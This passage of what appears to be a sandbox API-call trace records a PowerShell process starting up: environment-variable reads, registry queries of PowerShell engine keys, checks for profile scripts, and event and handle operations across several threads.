	[0569.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0569.905] VirtualQuery (in: lpAddress=0x1cb930, lpBuffer=0x1cc7f0, dwLength=0x30 | out: lpBuffer=0x1cc7f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0569.910] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.911] CoTaskMemFree (pv=0x3e2be0) 
	[0569.921] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.921] CoTaskMemFree (pv=0x3e2be0) 
	[0569.922] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.922] CoTaskMemFree (pv=0x3e2be0) 
	[0569.922] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.922] CoTaskMemFree (pv=0x3e2be0) 
	[0569.925] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.926] CoTaskMemFree (pv=0x3e2be0) 
	[0569.931] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.931] CoTaskMemFree (pv=0x3e2be0) 
	[0569.933] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0569.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.933] CoTaskMemFree (pv=0x3e2be0) 
	[0571.453] VirtualQuery (in: lpAddress=0x1cb930, lpBuffer=0x1cc7f0, dwLength=0x30 | out: lpBuffer=0x1cc7f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0576.123] VirtualQuery (in: lpAddress=0x1cb930, lpBuffer=0x1cc7f0, dwLength=0x30 | out: lpBuffer=0x1cc7f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0576.134] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0576.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.134] CoTaskMemFree (pv=0x3e2be0) 
	[0579.586] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3e3020
	[0579.588] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3e3130
	[0591.072] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0591.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.072] CoTaskMemFree (pv=0x3e3240) 
	[0591.074] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0591.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.074] CoTaskMemFree (pv=0x3e3240) 
	[0591.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.093] VirtualQuery (in: lpAddress=0x1cbbe0, lpBuffer=0x1ccaa0, dwLength=0x30 | out: lpBuffer=0x1ccaa0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0591.100] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda38 | out: phkResult=0x1cda38*=0x318) returned 0x0
	[0591.100] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd9bc, lpData=0x0, lpcbData=0x1cd9b8*=0x0 | out: lpType=0x1cd9bc*=0x1, lpData=0x0, lpcbData=0x1cd9b8*=0x56) returned 0x0
	[0591.100] CoTaskMemAlloc (cb=0x5a) returned 0x3b3260
	[0591.100] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd98c, lpData=0x3b3260, lpcbData=0x1cd988*=0x56 | out: lpType=0x1cd98c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd988*=0x56) returned 0x0
	[0591.101] CoTaskMemFree (pv=0x3b3260) 
	[0591.101] RegCloseKey (hKey=0x318) returned 0x0
	[0591.101] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda38 | out: phkResult=0x1cda38*=0x318) returned 0x0
	[0591.101] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd9bc, lpData=0x0, lpcbData=0x1cd9b8*=0x0 | out: lpType=0x1cd9bc*=0x1, lpData=0x0, lpcbData=0x1cd9b8*=0x56) returned 0x0
	[0591.101] CoTaskMemAlloc (cb=0x5a) returned 0x3b3260
	[0591.101] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd98c, lpData=0x3b3260, lpcbData=0x1cd988*=0x56 | out: lpType=0x1cd98c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd988*=0x56) returned 0x0
	[0591.101] CoTaskMemFree (pv=0x3b3260) 
	[0591.101] RegCloseKey (hKey=0x318) returned 0x0
	[0591.102] CoTaskMemAlloc (cb=0x20c) returned 0x1b7a2df0
	[0591.102] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7a2df0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0591.102] CoTaskMemFree (pv=0x1b7a2df0) 
	[0591.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0591.102] CoTaskMemAlloc (cb=0x20c) returned 0x1b7a2df0
	[0591.102] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7a2df0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0591.102] CoTaskMemFree (pv=0x1b7a2df0) 
	[0591.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0592.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0592.437] SetErrorMode (uMode=0x1) returned 0x1
	[0592.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd9a0 | out: lpFileInformation=0x1cd9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.437] SetErrorMode (uMode=0x1) returned 0x1
	[0592.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0592.437] SetErrorMode (uMode=0x1) returned 0x1
	[0592.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd9a0 | out: lpFileInformation=0x1cd9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.438] SetErrorMode (uMode=0x1) returned 0x1
	[0592.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0592.438] SetErrorMode (uMode=0x1) returned 0x1
	[0592.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd9a0 | out: lpFileInformation=0x1cd9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.438] SetErrorMode (uMode=0x1) returned 0x1
	[0592.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0592.438] SetErrorMode (uMode=0x1) returned 0x1
	[0592.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd9a0 | out: lpFileInformation=0x1cd9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.438] SetErrorMode (uMode=0x1) returned 0x1
	[0592.439] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.439] CoTaskMemFree (pv=0x3e3240) 
	[0592.439] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.439] CoTaskMemFree (pv=0x3e3240) 
	[0592.439] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.439] CoTaskMemFree (pv=0x3e3240) 
	[0592.440] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.440] CoTaskMemFree (pv=0x3e3240) 
	[0592.444] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.444] CoTaskMemFree (pv=0x3e3240) 
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x318
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x300
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1c4
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0592.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0592.449] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.449] CoTaskMemFree (pv=0x3e3240) 
	[0592.451] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0592.452] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cdb80 | out: lpMode=0x1cdb80) returned 1
	[0592.453] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.453] CoTaskMemFree (pv=0x3e3240) 
	[0592.457] SetEvent (hEvent=0x2fc) returned 1
	[0592.457] SetEvent (hEvent=0x318) returned 1
	[0592.457] SetEvent (hEvent=0x31c) returned 1
	[0592.457] SetEvent (hEvent=0x38c) returned 1
	[0592.457] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0592.459] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0592.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.459] CoTaskMemFree (pv=0x3e3240) 
	[0592.502] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8d8 | out: phkResult=0x1cd8d8*=0x344) returned 0x0
	[0592.502] RegQueryValueExW (in: hKey=0x344, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cd85c, lpData=0x0, lpcbData=0x1cd858*=0x0 | out: lpType=0x1cd85c*=0x0, lpData=0x0, lpcbData=0x1cd858*=0x0) returned 0x2

Thread:
	id = 323
	os_tid = 0xfa4


Thread:
	id = 330
	os_tid = 0xff0


Thread:
	id = 785
	os_tid = 0x1004


Thread:
	id = 790
	os_tid = 0xc38


Thread:
	id = 798
	os_tid = 0x1034


Thread:
	id = 812
	os_tid = 0x1090


Thread:
	id = 813
	os_tid = 0x109c

	[0460.684] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0526.707] LocalFree (hMem=0x3472c0) returned 0x0
	[0526.707] CloseHandle (hObject=0x1c4) returned 1
	[0526.707] CloseHandle (hObject=0x13) returned 1
	[0526.708] CloseHandle (hObject=0xf) returned 1
	[0526.708] RegCloseKey (hKey=0x300) returned 0x0
	[0526.708] RegCloseKey (hKey=0x2fc) returned 0x0
	[0526.709] RegCloseKey (hKey=0x2f8) returned 0x0
	[0526.709] LocalFree (hMem=0x347290) returned 0x0
	[0526.709] RegCloseKey (hKey=0x324) returned 0x0
	[0542.053] RegCloseKey (hKey=0x324) returned 0x0
	[0550.861] RegCloseKey (hKey=0x324) returned 0x0
	[0574.691] RegCloseKey (hKey=0x388) returned 0x0
	[0574.691] RegCloseKey (hKey=0x384) returned 0x0
	[0574.691] RegCloseKey (hKey=0x360) returned 0x0
	[0574.692] RegCloseKey (hKey=0x39c) returned 0x0
	[0574.692] RegCloseKey (hKey=0x37c) returned 0x0
	[0574.692] RegCloseKey (hKey=0x378) returned 0x0
	[0574.692] RegCloseKey (hKey=0x374) returned 0x0
	[0574.692] RegCloseKey (hKey=0x370) returned 0x0
	[0574.693] RegCloseKey (hKey=0x36c) returned 0x0
	[0574.693] RegCloseKey (hKey=0x368) returned 0x0
	[0574.693] RegCloseKey (hKey=0x364) returned 0x0
	[0574.694] RegCloseKey (hKey=0x30c) returned 0x0
	[0574.694] RegCloseKey (hKey=0x398) returned 0x0
	[0574.694] RegCloseKey (hKey=0x394) returned 0x0
	[0574.694] RegCloseKey (hKey=0x35c) returned 0x0
	[0574.694] RegCloseKey (hKey=0x358) returned 0x0
	[0574.695] RegCloseKey (hKey=0x354) returned 0x0
	[0574.695] RegCloseKey (hKey=0x350) returned 0x0
	[0574.695] RegCloseKey (hKey=0x34c) returned 0x0
	[0574.696] RegCloseKey (hKey=0x348) returned 0x0
	[0574.696] RegCloseKey (hKey=0x344) returned 0x0
	[0574.696] RegCloseKey (hKey=0x310) returned 0x0
	[0574.696] RegCloseKey (hKey=0x390) returned 0x0
	[0574.697] RegCloseKey (hKey=0x338) returned 0x0
	[0574.697] RegCloseKey (hKey=0x334) returned 0x0
	[0574.697] RegCloseKey (hKey=0x330) returned 0x0
	[0574.698] RegCloseKey (hKey=0x32c) returned 0x0
	[0574.698] RegCloseKey (hKey=0x328) returned 0x0
	[0574.698] RegCloseKey (hKey=0x1c4) returned 0x0
	[0574.699] RegCloseKey (hKey=0x300) returned 0x0
	[0574.699] RegCloseKey (hKey=0x2fc) returned 0x0
	[0574.699] RegCloseKey (hKey=0x38c) returned 0x0
	[0574.699] RegCloseKey (hKey=0x324) returned 0x0
	[0605.664] RegCloseKey (hKey=0x344) returned 0x0

Thread:
	id = 907
	os_tid = 0x1830


Thread:
	id = 1185
	os_tid = 0x1608

	[0593.554] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0593.559] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0593.564] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.564] CoTaskMemFree (pv=0x3e3240) 
	[0593.566] VirtualQuery (in: lpAddress=0x1c84d880, lpBuffer=0x1c84e740, dwLength=0x30 | out: lpBuffer=0x1c84e740*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.569] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.570] CoTaskMemFree (pv=0x3e3240) 
	[0593.572] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.572] CoTaskMemFree (pv=0x3e3240) 
	[0593.575] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.576] CoTaskMemFree (pv=0x3e3240) 
	[0593.585] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.586] CoTaskMemFree (pv=0x3e3240) 
	[0593.588] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.588] CoTaskMemFree (pv=0x3e3240) 
	[0593.590] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.590] CoTaskMemFree (pv=0x3e3240) 
	[0593.595] VirtualQuery (in: lpAddress=0x1c84db30, lpBuffer=0x1c84e9f0, dwLength=0x30 | out: lpBuffer=0x1c84e9f0*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.595] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.596] CoTaskMemFree (pv=0x3e3240) 
	[0593.598] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0593.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.598] CoTaskMemFree (pv=0x3e3240) 
	[0594.706] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0594.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.706] CoTaskMemFree (pv=0x3e3240) 
	[0594.708] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0594.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.708] CoTaskMemFree (pv=0x3e3240) 
	[0594.712] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0594.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.712] CoTaskMemFree (pv=0x3e3240) 
	[0595.715] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.715] CoTaskMemFree (pv=0x3e3240) 
	[0595.717] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.718] CoTaskMemFree (pv=0x3e3240) 
	[0595.719] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.719] CoTaskMemFree (pv=0x3e3240) 
	[0595.722] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.722] CoTaskMemFree (pv=0x3e3240) 
	[0595.723] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.723] CoTaskMemFree (pv=0x3e3240) 
	[0595.725] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.725] CoTaskMemFree (pv=0x3e3240) 
	[0595.726] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0595.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.727] CoTaskMemFree (pv=0x3e3240) 
	[0596.666] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0596.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.666] CoTaskMemFree (pv=0x3e3240) 
	[0597.821] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
	[0597.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3e3240, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0597.822] CoTaskMemFree (pv=0x3e3240) 
	[0597.825] CoTaskMemAlloc (cb=0x104) returned 0x3e3240
